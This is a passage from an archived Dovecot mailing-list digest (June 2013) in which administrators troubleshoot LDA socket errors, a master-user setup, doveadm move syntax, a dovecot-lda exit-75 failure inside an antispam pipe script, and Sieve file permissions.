this seems to be a nice idea to let users actually _test_ their scripts. However, I wonder how educated they are, in order to paste in a correct "mail file" incl. header and the like. Better would be to let them submit a message from a folder, or all messages in a folder. I.e., "run Sieve on folder 'TestSieve'", then users can just drag messages there and test it (or, if I had that functionality, copy them). Just a thought. Sean From skdovecot at smail.inf.fh-brs.de Fri Jun 21 10:37:25 2013 From: skdovecot at smail.inf.fh-brs.de (Steffen Kaiser) Date: Fri, 21 Jun 2013 09:37:25 +0200 (CEST) Subject: [Dovecot] Would attempting plaintext auth repeatably cause a DOS and server to crash? In-Reply-To: <3c385a12fd527a79cc37595ccfb83d8a@davenport.net.nz> References: <3c385a12fd527a79cc37595ccfb83d8a@davenport.net.nz> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Fri, 21 Jun 2013, Hugh Davenport wrote: > and a minute later the server lost contact to the world. When I checked a bit > later, > the underlying host machine (dovecot runs on a VM (KVM)) had been powered > off. I cannot believe that a DoS of a guest VM causes the host machine to power off. - -- Steffen Kaiser -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux) iQEVAwUBUcQCtl3r2wJMiz2NAQIufggAr5cbKwdTNBIC7+RqhXAMN4N0C+964Bn0 Nlj5bxgZOo1KxqhRbxkvuiH5BRs7kQ/o7Nr7O7xbO0YPbMt3lQTGnsbKdPgbKv7a ojqbSsXCxHOZkzNRkW4pDRty8JMEGQ0oSMBzRbVlMrS+9g+5FtFkPmOHFnHfEJ39 a91+O34fa42TbQgjmVPMWZQr6Oy6JtDcy7fhdzI8d5iPv5KI/rL81hSTr9bm7spk ma4rBOKZfkd66In8BkqJPNRMIgP7kyhGrrLxgOr4HlcgkxAm4+zo/eBAGQruM4u+ RcNa3IFTf0BpFrqL43XXS8ViqS5z16L4a/MPnHFZc8rzLKldolI97Q== =bCZ0 -----END PGP SIGNATURE----- From cryptodan at gmail.com Fri Jun 21 10:42:29 2013 From: cryptodan at gmail.com (Daniel Reinhardt) Date: Fri, 21 Jun 2013 03:42:29 -0400 Subject: [Dovecot] Would attempting plaintext auth repeatably cause a DOS and server to crash? In-Reply-To: References: <3c385a12fd527a79cc37595ccfb83d8a@davenport.net.nz> Message-ID: I doubt that the 1161 log lines would cause the VM to crash. It would potentially cause the logging directory to fill up if you have a small /var partition where the logs are kept and at that point it could potentially freeze the VM, but not cause the host to crash. I think your issue revolves around the storms. I also do not consider a 1161 log lines a DoS. If it takes 1161 lines of failure entries to deny service to your server, then I would take a look at your setup. On Fri, Jun 21, 2013 at 3:37 AM, Steffen Kaiser < skdovecot at smail.inf.fh-brs.de> wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > On Fri, 21 Jun 2013, Hugh Davenport wrote: > > and a minute later the server lost contact to the world. When I checked a >> bit later, >> the underlying host machine (dovecot runs on a VM (KVM)) had been powered >> off. >> > > I cannot believe that a DoS of a guest VM causes the host machine to power > off. > > - -- Steffen Kaiser > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.4.11 (GNU/Linux) > > iQEVAwUBUcQCtl3r2wJMiz2NAQIufg**gAr5cbKwdTNBIC7+RqhXAMN4N0C+**964Bn0 > Nlj5bxgZOo1KxqhRbxkvuiH5BRs7kQ**/**o7Nr7O7xbO0YPbMt3lQTGnsbKdPgbK**v7a > ojqbSsXCxHOZkzNRkW4pDRty8JMEGQ**0oSMBzRbVlMrS+9g+**5FtFkPmOHFnHfEJ39 > a91+**O34fa42TbQgjmVPMWZQr6Oy6JtDcy7**fhdzI8d5iPv5KI/rL81hSTr9bm7spk > ma4rBOKZfkd66In8BkqJPNRMIgP7ky**hGrrLxgOr4HlcgkxAm4+zo/**eBAGQruM4u+ > RcNa3IFTf0BpFrqL43XXS8ViqS5z16**L4a/MPnHFZc8rzLKldolI97Q== > =bCZ0 > -----END PGP SIGNATURE----- > -- Daniel Reinhardt cryptodan at cryptodan.net http://www.cryptodan.net 301-875-7018(c) 410-455-0488(h) From smadam9 at gmail.com Fri Jun 21 13:54:11 2013 From: smadam9 at gmail.com (Adam Ramirez) Date: Fri, 21 Jun 2013 12:54:11 +0200 Subject: [Dovecot] LDA Connection Refused with auth-userdb Message-ID: Hi there, I've encountered an issue with the LDA in which I get a "Connection refused" error. There is a serverfault question ( http://serverfault.com/questions/517262/dovecot-with-postfix-configuration-has-connection-refused-when-accessing-auth) if you would like to read that version, otherwise, the details are as follows: Dovecot 2.0.19 Postfix 2.9.6 Ubuntu 12.04 The actual error message I receive is --------------------------------------------------------------- postfix/pickup[16842]: 019023A06AB: uid=1000 from= postfix/cleanup[19542]: 019023A06AB: message-id= <20130620140358.019023A06AB at mail-server-berkshelf> postfix/qmgr[16843]: 019023A06AB: from=, size=382, nrcpt=1 (queue active) dovecot: lda: Debug: Loading modules from directory: /usr/lib/dovecot/modules dovecot: lda: Debug: Module loaded: /usr/lib/dovecot/modules/lib90_sieve_plugin.so ---> dovecot: lda: Error: userdb lookup: connect(/var/run/dovecot/auth-userdb) failed: Connection refused dovecot: lda: Fatal: Internal error occurred. Refer to server log for more information. postfix/pipe[19545]: 019023A06AB: to=, relay=dovecot, delay=1.2, delays=0.04/0.01/0/1.1, dsn=4.3.0, status=deferred (temporary failure) dovecot -n snippet: -------------------------------------------------------------- # 2.0.19: /etc/dovecot/dovecot.conf # OS: Linux 3.2.0-23-generic x86_64 Ubuntu 12.04 LTS ext4 auth_debug = yes auth_debug_passwords = yes auth_mechanisms = plain login auth_socket_path = /var/run/dovecot/auth-userdb auth_verbose = yes auth_verbose_passwords = plain mail_debug = yes mail_location = maildir:/var/vmail/%d/%n/Maildir managesieve_notify_capability = mailto managesieve_sieve_capability = fileinto reject envelope encoded-character vacation subaddress comparator-i;ascii-numeric relational regex imap4flags copy include variables body enotify environment mailbox date ihave passdb { args = /etc/dovecot/dovecot-sql.conf.ext driver = sql } plugin { sieve = ~/.dovecot.sieve sieve_dir = ~/sieve } postmaster_address = info@*****.com protocols = imap pop3 sieve imap pop3 service auth-worker { user = vmail } service auth { unix_listener /var/spool/postfix/private/auth { group = postfix mode = 0660 user = postfix } unix_listener auth-userdb { group = vmail mode = 0644 user = vmail } user = dovecot } service managesieve-login { inet_listener sieve { port = 4190 } } ssl = no ssl_cert = References: Message-ID: On Fri, Jun 21, 2013 at 12:54 PM, Adam Ramirez wrote: > ---> dovecot: lda: Error: userdb lookup: > connect(/var/run/dovecot/auth-userdb) failed: Connection refused > [...] > unix_listener auth-userdb { > group = vmail > mode = 0644 > user = vmail > } > > File permissions on auth-userdb > ----------------------------------------- > srw-r--r-- 1 vmail vmail 0 Jun 20 13:04 /var/run/dovecot/auth-userdb > [...] # The default 0666 mode allows anyone to connect to the socket, but the # userdb lookups will succeed only if the userdb returns an "uid" field that # matches the caller process's UID. Also if caller's uid or gid matches the # socket's uid or gid the lookup succeeds. Anything else causes a failure. > I have tried changing the permissions and owner of auth-userdb to 777 and > dovecot:dovecot, but there wasn't a change. > This sounds strange; did you restart dovecot and Postfix? Cheers, Luca From smadam9 at gmail.com Fri Jun 21 14:59:35 2013 From: smadam9 at gmail.com (Adam Ramirez) Date: Fri, 21 Jun 2013 13:59:35 +0200 Subject: [Dovecot] LDA Connection Refused with auth-userdb In-Reply-To: References: Message-ID: Yes, dovecot and postfix are both restarted on each change I make to the config files. On Fri, Jun 21, 2013 at 1:40 PM, Luca Fornasari wrote: > On Fri, Jun 21, 2013 at 12:54 PM, Adam Ramirez wrote: > > > ---> dovecot: lda: Error: userdb lookup: > > connect(/var/run/dovecot/auth-userdb) failed: Connection refused > > > > [...] > > > > unix_listener auth-userdb { > > group = vmail > > mode = 0644 > > user = vmail > > } > > > > File permissions on auth-userdb > > ----------------------------------------- > > srw-r--r-- 1 vmail vmail 0 Jun 20 13:04 /var/run/dovecot/auth-userdb > > > > [...] > # The default 0666 mode allows anyone to connect to the socket, but the > # userdb lookups will succeed only if the userdb returns an "uid" field > that > # matches the caller process's UID. Also if caller's uid or gid matches > the > # socket's uid or gid the lookup succeeds. Anything else causes a > failure. > > > > > I have tried changing the permissions and owner of auth-userdb to 777 and > > dovecot:dovecot, but there wasn't a change. > > > > This sounds strange; did you restart dovecot and Postfix? > > Cheers, > Luca > From izul_2003 at yahoo.com Fri Jun 21 07:30:10 2013 From: izul_2003 at yahoo.com (izul) Date: Thu, 20 Jun 2013 21:30:10 -0700 (PDT) Subject: [Dovecot] Config for master user in dovecot 1.1.20 Message-ID: <1371789010512-42906.post@n4.nabble.com> Hi folks.. Im planning to migrate my mail server using imapsync.I need master user in my dovecot 1.1.20.Im so blind about this.Anybody can help me? Below is my 'dovecot -n' : ############### [root at mail etc]# dovecot -n # 1.1.20: /etc/dovecot.conf # OS: Linux 2.6.18-194.8.1.el5 i686 CentOS release 5.5 (Final) log_path: /var/log/dovecot.log protocols: pop3 pop3s imap imaps listen: * ssl_cert_file: /etc/pki/tls/certs/iRedMail_CA.pem ssl_key_file: /etc/pki/tls/private/iRedMail.key login_dir: /var/run/dovecot/login login_executable(default): /usr/libexec/dovecot/imap-login login_executable(imap): /usr/libexec/dovecot/imap-login login_executable(pop3): /usr/libexec/dovecot/pop3-login mail_uid: 507 mail_gid: 507 mail_location: maildir:/%Lh/Maildir/:INDEX=/%Lh/Maildir/ mail_debug: yes mail_executable(default): /usr/libexec/dovecot/imap mail_executable(imap): /usr/libexec/dovecot/imap mail_executable(pop3): /usr/libexec/dovecot/pop3 mail_plugins(default): quota imap_quota zlib mail_plugins(imap): quota imap_quota zlib mail_plugins(pop3): quota zlib mail_plugin_dir(default): /usr/lib/dovecot/imap mail_plugin_dir(imap): /usr/lib/dovecot/imap mail_plugin_dir(pop3): /usr/lib/dovecot/pop3 pop3_client_workarounds(default): pop3_client_workarounds(imap): pop3_client_workarounds(pop3): outlook-no-nuls oe-ns-eoh lda: postmaster_address: root auth_socket_path: /var/run/dovecot/auth-master mail_plugins: cmusieve quota sieve_global_path: /var/vmail/sieve/dovecot.sieve log_path: /var/log/sieve.log auth default: mechanisms: plain login user: vmail master_user_separator: * verbose: yes debug: yes debug_passwords: yes passdb: driver: sql args: /etc/dovecot-mysql.conf passdb: driver: passwd-file args: /etc/dovecot-master-user-password pass: yes master: yes userdb: driver: sql args: /etc/dovecot-mysql.conf socket: type: listen client: path: /var/spool/postfix/dovecot-auth mode: 438 user: postfix group: postfix master: path: /var/run/dovecot/auth-master mode: 438 user: vmail group: vmail plugin: quota_warning: storage=85%% /usr/bin/dovecot-quota-warning.sh 85 quota_warning2: storage=90%% /usr/bin/dovecot-quota-warning.sh 90 quota_warning3: storage=95%% /usr/bin/dovecot-quota-warning.sh 95 quota: maildir quota_rule: *:storage=100M expire: Trash 7 Trash/* 7 Junk 30 expire_dict: proxy::expire auth_socket_path: /var/run/dovecot/auth-master dict: expire: db:/var/lib/dovecot/expire/expire.db [root at mail etc]# ############### And below is my dovecot.conf : (part of it) ############### auth_master_user_separator = * auth default { auth_master_user_separator= * mechanisms = plain login user = vmail passdb sql { args = /etc/dovecot-mysql.conf } userdb sql { args = /etc/dovecot-mysql.conf } socket listen { master { path = /var/run/dovecot/auth-master mode = 0666 user = vmail group = vmail } client { path = /var/spool/postfix/dovecot-auth mode = 0666 user = postfix group = postfix } } # Add below lines passdb passwd-file { args = /etc/dovecot-master-user-password master = yes pass = yes } } ############### -- View this message in context: http://dovecot.2317879.n4.nabble.com/Config-for-master-user-in-dovecot-1-1-20-tp42906.html Sent from the Dovecot mailing list archive at Nabble.com. From h.reindl at thelounge.net Fri Jun 21 16:21:22 2013 From: h.reindl at thelounge.net (Reindl Harald) Date: Fri, 21 Jun 2013 15:21:22 +0200 Subject: [Dovecot] Config for master user in dovecot 1.1.20 In-Reply-To: <1371789010512-42906.post@n4.nabble.com> References: <1371789010512-42906.post@n4.nabble.com> Message-ID: <51C45352.3030704@thelounge.net> Am 21.06.2013 06:30, schrieb izul: > Im planning to migrate my mail server using imapsync.I need master user in > my dovecot 1.1.20.Im so blind about this.Anybody can help me? why in the world is someone installing 1.1 in 2013 on a new server while current version is 2.2.3 and virtually nobody knows about 1.1 years after support was dropped? -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 263 bytes Desc: OpenPGP digital signature URL: From alec at alec.pl Fri Jun 21 16:30:52 2013 From: alec at alec.pl (A.L.E.C) Date: Fri, 21 Jun 2013 15:30:52 +0200 Subject: [Dovecot] Config for master user in dovecot 1.1.20 In-Reply-To: <51C45352.3030704@thelounge.net> References: <1371789010512-42906.post@n4.nabble.com> <51C45352.3030704@thelounge.net> Message-ID: <51C4558C.3050608@alec.pl> On 06/21/2013 03:21 PM, Reindl Harald wrote: > > > Am 21.06.2013 06:30, schrieb izul: >> Im planning to migrate my mail server using imapsync.I need master user in >> my dovecot 1.1.20.Im so blind about this.Anybody can help me? > > why in the world is someone installing 1.1 in 2013 on a new server > while current version is 2.2.3 and virtually nobody knows about > 1.1 years after support was dropped? Do you really have to respond to every email on this list? Even if you have nothing productive to say? Please. As I understand the OP, he uses 1.1.20 now and this is the version to migrate from. -- Aleksander 'A.L.E.C' Machniak LAN Management System Developer [http://lms.org.pl] Roundcube Webmail Developer [http://roundcube.net] --------------------------------------------------- PGP: 19359DC1 @@ GG: 2275252 @@ WWW: http://alec.pl From lst_hoe02 at kwsoft.de Fri Jun 21 17:02:08 2013 From: lst_hoe02 at kwsoft.de (lst_hoe02 at kwsoft.de) Date: Fri, 21 Jun 2013 16:02:08 +0200 Subject: [Dovecot] Config for master user in dovecot 1.1.20 In-Reply-To: <1371789010512-42906.post@n4.nabble.com> References: <1371789010512-42906.post@n4.nabble.com> Message-ID: <20130621160208.Horde.LVAVV0U0tlRifhmnufderA2@webmail.kwsoft.de> Zitat von izul : > Hi folks.. > Im planning to migrate my mail server using imapsync.I need master user in > my dovecot 1.1.20.Im so blind about this.Anybody can help me? > Below is my 'dovecot -n' : http://wiki1.dovecot.org/Authentication/MasterUsers ??? Regards Andreas -------------- next part -------------- A non-text attachment was scrubbed... Name: smime.p7s Type: application/pkcs7-signature Size: 6144 bytes Desc: S/MIME Cryptographic Signature URL: From vincent_graphiste at hotmail.com Fri Jun 21 17:50:49 2013 From: vincent_graphiste at hotmail.com (vincent truc) Date: Fri, 21 Jun 2013 14:50:49 +0000 Subject: [Dovecot] doveadm move command Message-ID: Hello I want to transfer an email from user1 at domain.com to put it in a folder of another user: user2 at domain.com For that, it seems to me appropriate to use 'doveadm move' command, but I can not get the right result. Can you help me? syntax: doveadm move [-u |-A] [-S ] [user ] my attempts: doveadm move -u user2 at domain.com DIRECTORY_2 mailbox user1 at domain.com:'DIRECTORY_1' all return: Error: Syncing mailbox user1 at domaine.fr:DOSSIER_1 failed: Mailbox doesn't exist: user1 at domaine.fr:DOSSIER_1 doveadm -u user2 at domain.com DIRECTORY_2 mailbox sdbox:/complete/path/user1 at domain.com/mailboxes/DIRECTORY_1 all return: Error: Syncing mailbox sdbox:/complete/path/user1 at domain.com/mailboxes/DIRECTORY_1 failed: Mailbox doesn't exist: sdbox:/complete/path/user1 at domain.com/mailboxes/DIRECTORY_1 doveadm move -u user2 at domain.com DIRECTORY_2 mailbox user1 at domain.com 'DIRECTORY_2' all return: Fatal: Unknown argument DIRECTORY_2 From ben at indietorrent.org Fri Jun 21 20:22:04 2013 From: ben at indietorrent.org (Ben Johnson) Date: Fri, 21 Jun 2013 13:22:04 -0400 Subject: [Dovecot] Calling dovecot-lda from within Antispam pipe script (bash) seems to have no effect In-Reply-To: References: Message-ID: <51C48BBC.9010103@indietorrent.org> On 6/20/2013 5:58 PM, Joseph Tam wrote: > Ben Johnson writes: > >> It really boils-down to the fact that I can call the following on the >> command-line and it functions as expected: >> >> su vmail -c '/usr/lib/dovecot/deliver -a "sa-training at example.com" -d >> "sa-training at example.com" -m "Training.SPAM" -p >> "/tmp/sendmail-msg-25794.txt"' >> >> Yet, when I attempt to do the exact same thing from within the pipe >> script that Dovecot Antispam calls, I receive exit code 75 from >> deliver/dovecot-lda and absolutely nothing is logged, with exception of >> the information of which I'm already aware (logged to syslog). > > Have you also checked the environment variables? I think dovecot-lda > gets some information from them. Also, it's possible the PATH or some > other critical environment variables is different, causing the > difference in outcome. > > Joseph Tam Thanks for the reply, Joseph. I appreciate your time. I added debugging output to the script, which now prints the environment variables. My script now outputs the following: ----------------------------------------------------------------- 25985-start (--spam) ENV value is: DOVECOT_PRESERVE_ENVS=TZ SSL_SOCKET_COUNT=0 DOVECOT_CHILD_PROCESS=1 CONFIG_FILE=/var/run/dovecot/config SOCKET_COUNT=1 PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin PWD=/var/vmail/example.com/ben CLIENT_LIMIT=1 GENERATION=9 DOVECOT_VERSION=2.0.19 SHLVL=1 LOG_SERVICE=1 SERVICE_COUNT=1 _=/usr/bin/env Checking if the command-line input argument string (--spam) contains the string "ham" or "spam" Mode is "SPAM" Calling (as user vmail) '/usr/lib/dovecot/deliver -d "sa-training at example.com" -m "Training.SPAM" -p "/tmp/sendmail-msg-25985.txt"' Exit status was 75 25985-end ----------------------------------------------------------------- Does anything jump-out at you? Thanks again, -Ben From ben at indietorrent.org Fri Jun 21 20:34:38 2013 From: ben at indietorrent.org (Ben Johnson) Date: Fri, 21 Jun 2013 13:34:38 -0400 Subject: [Dovecot] Calling dovecot-lda from within Antispam pipe script (bash) seems to have no effect In-Reply-To: <1371780023.2588.175.camel@worklian> References: <51C1FDFE.8010506@indietorrent.org> <1371701672.2588.50.camel@worklian> <51C30B3D.3070109@indietorrent.org> <51C32ED5.2090709@indietorrent.org> <1371780023.2588.175.camel@worklian> Message-ID: <51C48EAE.5020308@indietorrent.org> On 6/20/2013 10:00 PM, Bob Miller wrote: > Hi Ben, > > >>> Maybe using something like set -e to try and get some output from the >>> script? >>> > >> Adding the -e switch doesn't seem to produce any output, either. > > To be clear, I meant putting the line: > > set -e > > near the top of your script. I forget exactly how it functions, but it > makes it so when a script fails it spits out a why on stdout (or maybe > stderr). I believe the -x argument does something useful for > troubleshooting too, but it's been too long. `man bash` knows all... Oops! Now I understand what you meant. I tried adding "set -e" at the top of my shell script, but it doesn't shed much light on the problem. A quick Google search reveals that "set -e causes the shell to exit if any subcommand or pipeline returns a non-zero status." The result is predictable: the call to "deliver" exits with status 75, so using "set -e" causes the script as a whole to return a non-zero exit status, which in turn causes Dovecot to throw an error in my IMAP client: "[SERVERBUG] failed to send mail". > >> It really boils-down to the fact that I can call the following on the >> command-line and it functions as expected: >> >> su vmail -c '/usr/lib/dovecot/deliver -a "sa-training at example.com" -d >> "sa-training at example.com" -m "Training.SPAM" -p >> "/tmp/sendmail-msg-25794.txt"' >> >> Yet, when I attempt to do the exact same thing from within the pipe >> script that Dovecot Antispam calls, I receive exit code 75 from >> deliver/dovecot-lda and absolutely nothing is logged, with exception of >> the information of which I'm already aware (logged to syslog). >> >> I am echo-ing $(whoami) just before calling "deliver" within the pipe >> script and the output is "vmail". So, it's not as though the vmail user >> somehow lacks the permissions required to send via dovecot-lda. > > There are two things that came to mind when I read your mail yesterday. > They are the first things I check for when my commands work and my > scripts don't. > > The first is $PATH, I have found innumerable times when a script > wouldn't run it was because it wasn't running with a fully loaded $PATH > variable, and this is especially true if you are launching your script > from cron. To work around this I either put a PATH= at the top of the > script, or I run the script as an argument to bash instead of using the > executable bit (ie `bash /path/to/script.sh` instead of `./script.sh`) > so the path is retained from the shell. I decided against mentioning > this yesterday because I noted you only used full paths in your script, > which should also work to avoid this problem. All excellent insights. You can see the PATH value in my previous message on this subject (from a few minutes ago); it matches the value that I see as "root" when I print the PATH within the shell. So, that seems okay. Also, I took your good advice and eliminated the potential for the vmail user's shell choice (which happens to be /bin/sh, *not* /bin/bash) to affect the script's behavior. To do this I modified my antispam configuration directives as such: antispam_pipe_program = /bin/bash antispam_pipe_program_args = /usr/bin/sa-learn-pipe.sh antispam_pipe_program_spam_arg = --spam antispam_pipe_program_notspam_arg = --ham Unfortunately, this change doesn't change the result at all; the call to "deliver" still exits with status code 75. > The other thing I didn't mention was the permissions on the path > to /usr/lib/dovecot/deliver (or any other path, really). Directories > with no world read/execute can prevent scripts from using files beneath > them if they don't have permissions on each directory level in the path. > I didn't mention this yesterday because you said you ran the script as > vmail. However, looking at your "su vmail -c" command, I remember some > times when "su postrgres -c" didn't work when "su - postrgres" then > running the command did. I have tried using "su vmail -c [...]", as well as "su vmail" and then pasting the command into the shell. Both yield the same result. Also, there's no question that the vmail user is able to execute dovecot-adm; if he weren't, then a) pasting the command into the shell wouldn't work (and this does work), and b) I wouldn't be receiving exit status code 75, which is unique to dovecot-adm (I assume that I'd receive a more generic code, like 1, if it was a permissions problem). > Probably neither of these will be useful to you, but I mention them in > hope that they trigger and idea or set you on an investigative path that > proves helpful... Any help at all is useful! I really appreciate the time and thought you put into your posts. I wish I felt closer to a solution... :( Please do reply if you have any additional thoughts. I'm at my wit's end here! Thanks again, -Ben > >> >> What is the explanation for this behavior? It has to be something to do >> with how the plug-in calls the script. Does the plug-in call the script >> in some other context, like chroot? >> >> As a final point of note, is it just me, or is the "90-plugin.conf" >> snippet incorrect at the bottom of >> http://wiki2.dovecot.org/Plugins/Antispam ? Those values appear to be >> for the analogous Dovecot 1 plug-in, e.g., "antispam_mail_sendmail" is >> used, when the equivalent directive is called "antispam_pipe_program" in >> versions >= 2.0. >> >> -Ben > From mrten+dovecot at ii.nl Fri Jun 21 22:01:55 2013 From: mrten+dovecot at ii.nl (Mrten) Date: Fri, 21 Jun 2013 21:01:55 +0200 Subject: [Dovecot] Calling dovecot-lda from within Antispam pipe script (bash) seems to have no effect In-Reply-To: <51C48EAE.5020308@indietorrent.org> References: <51C1FDFE.8010506@indietorrent.org> <1371701672.2588.50.camel@worklian> <51C30B3D.3070109@indietorrent.org> <51C32ED5.2090709@indietorrent.org> <1371780023.2588.175.camel@worklian> <51C48EAE.5020308@indietorrent.org> Message-ID: <51C4A323.6030905@ii.nl> On 21/6/2013 19:34 , Ben Johnson wrote: > Please do reply if you have any additional thoughts. I'm at my wit's > end here! When all else failes, use strace -f -F :) (add it in front of the deliver call and expect LOTS of output) Maarten. From ben at indietorrent.org Fri Jun 21 22:54:48 2013 From: ben at indietorrent.org (Ben Johnson) Date: Fri, 21 Jun 2013 15:54:48 -0400 Subject: [Dovecot] Calling dovecot-lda from within Antispam pipe script (bash) seems to have no effect In-Reply-To: <51C4A323.6030905@ii.nl> References: <51C1FDFE.8010506@indietorrent.org> <1371701672.2588.50.camel@worklian> <51C30B3D.3070109@indietorrent.org> <51C32ED5.2090709@indietorrent.org> <1371780023.2588.175.camel@worklian> <51C48EAE.5020308@indietorrent.org> <51C4A323.6030905@ii.nl> Message-ID: <51C4AF88.3040205@indietorrent.org> On 6/21/2013 3:01 PM, Mrten wrote: > On 21/6/2013 19:34 , Ben Johnson wrote: > >> Please do reply if you have any additional thoughts. I'm at my wit's >> end here! > > When all else failes, use strace -f -F :) > > (add it in front of the deliver call and expect LOTS of output) > > Maarten. > YES! Brilliant, Maarten! That tells us what we need to know. Here is the relevant bit: write(2, "\1\00429770 user sa-training at exampl"..., 139^A^D29770 user sa-training at example.com: Error reading configuration: net_connect_unix(/var/run/dovecot/config) failed: Permission denied It seems the issue here is that "root" is the only user who is allowed to read Dovecot's configuration file. Presumably, Dovecot, like most services, is started as "root" and then drops its permissions to least-required once started. Obviously, it would be imprudent to modify the permissions on /var/run/dovecot/config; they're set that way for a good reason. What are the other options? I did see the "System Users" section at http://wiki.dovecot.org/LDA , and maybe that's what I missed. ----------------------------------------------------------------------- System users You can use deliver with a few selected system users (ie. user is found from /etc/passwd / NSS) by calling deliver in the user's ~/.forward file: | "/usr/local/libexec/dovecot/deliver" This should work with any MTA which supports per-user .forward files. For qmail's per-user setup, see LDA/Qmail. This method doesn't require the authentication socket explained below since it's executed as the user itself. ----------------------------------------------------------------------- I'm struggling to identify this section's relevance to my situation. I thought, "Maybe I need to add the above-cited line to the vmail user's ~/.forward file." But I don't see how that will have any effect. I feel like I'm almost there; just need one more nudge :) Thanks for all the help! -Ben From ben at morrow.me.uk Fri Jun 21 23:01:10 2013 From: ben at morrow.me.uk (Ben Morrow) Date: Fri, 21 Jun 2013 21:01:10 +0100 Subject: [Dovecot] Calling dovecot-lda from within Antispam pipe script (bash) seems to have no effect In-Reply-To: <51C48EAE.5020308@indietorrent.org> References: <51C1FDFE.8010506@indietorrent.org> <1371701672.2588.50.camel@worklian> <51C30B3D.3070109@indietorrent.org> <51C32ED5.2090709@indietorrent.org> <1371780023.2588.175.camel@worklian> <51C48EAE.5020308@indietorrent.org> Message-ID: <20130621200109.GA3365@anubis.morrow.me.uk> At 1PM -0400 on 21/06/13 you (Ben Johnson) wrote: > On 6/20/2013 10:00 PM, Bob Miller wrote: > > > >> It really boils-down to the fact that I can call the following on the > >> command-line and it functions as expected: > >> > >> su vmail -c '/usr/lib/dovecot/deliver -a "sa-training at example.com" -d > >> "sa-training at example.com" -m "Training.SPAM" -p > >> "/tmp/sendmail-msg-25794.txt"' > >> > >> Yet, when I attempt to do the exact same thing from within the pipe > >> script that Dovecot Antispam calls, I receive exit code 75 from > >> deliver/dovecot-lda and absolutely nothing is logged, with exception of > >> the information of which I'm already aware (logged to syslog). Can you change lda to always log to syslog? It's possible you're not seeing any logs because lda doesn't have permission to write to the log files. > >> I am echo-ing $(whoami) just before calling "deliver" within the pipe > >> script and the output is "vmail". So, it's not as though the vmail user > >> somehow lacks the permissions required to send via dovecot-lda. > > > > There are two things that came to mind when I read your mail yesterday. > > They are the first things I check for when my commands work and my > > scripts don't. > > > > The first is $PATH, I have found innumerable times when a script > > wouldn't run it was because it wasn't running with a fully loaded $PATH > > variable, and this is especially true if you are launching your script > > from cron. To work around this I either put a PATH= at the top of the > > script, or I run the script as an argument to bash instead of using the > > executable bit (ie `bash /path/to/script.sh` instead of `./script.sh`) > > so the path is retained from the shell. I decided against mentioning > > this yesterday because I noted you only used full paths in your script, > > which should also work to avoid this problem. > > All excellent insights. > > You can see the PATH value in my previous message on this subject (from > a few minutes ago); it matches the value that I see as "root" when I > print the PATH within the shell. So, that seems okay. > > Also, I took your good advice and eliminated the potential for the vmail > user's shell choice (which happens to be /bin/sh, *not* /bin/bash) Are you on a system where they are different? > to > affect the script's behavior. To do this I modified my antispam > configuration directives as such: > > antispam_pipe_program = /bin/bash It's generally better to write scripts in portable (or POSIX, at least) Bourne shell, rather than relying on features of particular shells. > antispam_pipe_program_args = /usr/bin/sa-learn-pipe.sh > antispam_pipe_program_spam_arg = --spam > antispam_pipe_program_notspam_arg = --ham > > Unfortunately, this change doesn't change the result at all; the call to > "deliver" still exits with status code 75. > > > The other thing I didn't mention was the permissions on the path > > to /usr/lib/dovecot/deliver (or any other path, really). Directories > > with no world read/execute can prevent scripts from using files beneath > > them if they don't have permissions on each directory level in the path. > > I didn't mention this yesterday because you said you ran the script as > > vmail. However, looking at your "su vmail -c" command, I remember some > > times when "su postrgres -c" didn't work when "su - postrgres" then > > running the command did. > > I have tried using "su vmail -c [...]", as well as "su vmail" and then > pasting the command into the shell. Both yield the same result. Have you checked the group rights are the same in both cases? Is there any sort of MAC framework (SELinux or something similar) involved here? > Also, there's no question that the vmail user is able to execute > dovecot-adm; if he weren't, then a) pasting the command into the shell > wouldn't work (and this does work), and b) I wouldn't be receiving exit > status code 75, which is unique to dovecot-adm (I assume that I'd > receive a more generic code, like 1, if it was a permissions problem). 75 is a standard exit code from indicating temporary failure. Mail delivery programs need to be careful to distinguish between temporary and permanent failure, so they nearly always use the appropriate exit code. > > > Probably neither of these will be useful to you, but I mention them in > > hope that they trigger and idea or set you on an investigative path that > > proves helpful... > > Any help at all is useful! I really appreciate the time and thought you > put into your posts. I wish I felt closer to a solution... :( > > Please do reply if you have any additional thoughts. I'm at my wit's end > here! As I believe someone else has already mentioned, the big hammer of strace is probably the most straightforward next step. Ben From d.parthey at metaways.de Fri Jun 21 23:27:42 2013 From: d.parthey at metaways.de (Daniel Parthey) Date: Fri, 21 Jun 2013 22:27:42 +0200 Subject: [Dovecot] Sieve file permission problem In-Reply-To: <25E4BE7C7FD74CAF870820FCE3956BBB@lippai.net> References: <25E4BE7C7FD74CAF870820FCE3956BBB@lippai.net> Message-ID: <51C4B73E.9020404@metaways.de> Am 20.06.2013 10:16, schrieb Zoltan Lippai: > Thanks for the answer, I'm not sure what you mean by the additional permission details. > Here is a quick example: > /var/mail/domainname.hu/zolcsi chmod: 700, owner: vmail:mail > After I set the initial sieve filters, the following file and directory gets created: > /var/mail/domainname.hu/zolcsi/sieve (directory) chmod: 700, owner: vmail:mail > /var/mail/domainname.hu/zolcsi/.dovecot.sieve (symlink to the sieve/sieve.sieve file) chmod: 600, owner: vmail:mail > > After these two are created then the webmail can't modify them unless I delete the files manually. > > I looked in the mail.log and mail.err files, but couldn't find anything related to this. > Perhaps if I set the log level to a higher value? > > Or is it possible to connect via telnet to port 2000 and issue some commands to see the actual answers of the ManageSieve server? > > Best regards, > Zoltan Try if you can modify your sieve script when connecting with Thunderbird Sieve Extension to your MANAGESIEVE port 4190 or 2000. Can Afterlogic webmail be configured to use MANAGESIEVE protocol or does it write directly to the filesystem from the webserver user (which might be different from vmail, e.g. apache) Regards Daniel -- Dipl.-Inf. Daniel Parthey System Engineer Metaways Infosystems GmbH Pickhuben 2, D-20457 Hamburg E-Mail: d.parthey at metaways.de Web: http://www.metaways.de Tel: +49 (0)40 317031-537 Fax: +49 (0)40 317031-937 Metaways Infosystems GmbH - Sitz: D-22967 Tremsb?ttel Handelsregister: Amtsgericht L?beck HRB 4508 AH Gesch?ftsf?hrung: Hermann Thaele, L?der-H.Thaele From 